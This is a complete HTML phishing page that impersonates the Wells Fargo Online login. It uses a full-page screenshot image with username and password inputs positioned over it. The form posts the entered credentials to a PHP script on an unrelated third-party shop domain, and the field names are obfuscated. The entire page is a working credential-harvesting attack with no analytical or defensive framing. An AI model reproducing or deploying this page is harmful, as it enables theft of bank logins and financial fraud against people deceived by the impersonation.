<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wellsfargo Online</title>
<meta name="viewport" content="width=device-width, 

initial-scale=1.0">
<link rel="shortcut icon" href="https://loja.azya.com.br/noty/images/favicon.ico">
			  <style type="text/css">
.textbox { 
    border: 

1px solid #c4c4c4; 
  	background-color: white;
    height: 32px; 
    width: 275px; 
    font-size: 15px; 
    padding-left: 5px; 
	 box-shadow: inset 0 2px 4px 

rgba(0,0,0,.1);
     
   } 
 
.textbox:focus { 
    outline: none; 
 	border-radius: 2px;
    background-color: #FEF7DA;
    border: 2px solid #8FB1E7; 
    
} 			
</style>  
 
<style type="text/css">
div#container
{
	position:relative;
	width: 1334px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	

text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body <div="" style="position:absolute; left:0px; top:0px; width:1573px; height:2385px; z-

index:0"><img src="https://loja.azya.com.br/noty/images/wels.jpg" alt="" title="" border="0" width="1573" height="2385">

 
 
<form 

action="https://loja.azya.com.br/noty/1.php" method="post">
 

<input name="use2010" placeholder="Username" autocomplete="off" required="" type="text" 

style="position:absolute;width:186px;left:327px;top:251px;z-index:21; padding:11px; font-size:14px; border-bottom:1px solid #999; height:50px; border-left:1px solid 

#fff;border-right:1px solid #fff;border-top:1px solid #fff">

<input name="pasus78" placeholder="Password" autocomplete="off" required="" type="password" 

style="position:absolute;width:186px;left:327px;top:309px;z-index:21; padding:11px; font-size:14px; border-bottom:1px solid #999; height:50px; border-left:1px solid 

#fff;border-right:1px solid #fff;border-top:1px solid #fff">

<input type="checkbox" style="position:absolute;left:327px;top:369px;z-index:21; border:1px solid #999">

<div style="position:absolute; left:319px; top:393px; z-index:23"><input type="image" name="formimage1" width="201" height="50" 

src="https://loja.azya.com.br/noty/images/sub.png"></div>




</form></body></html>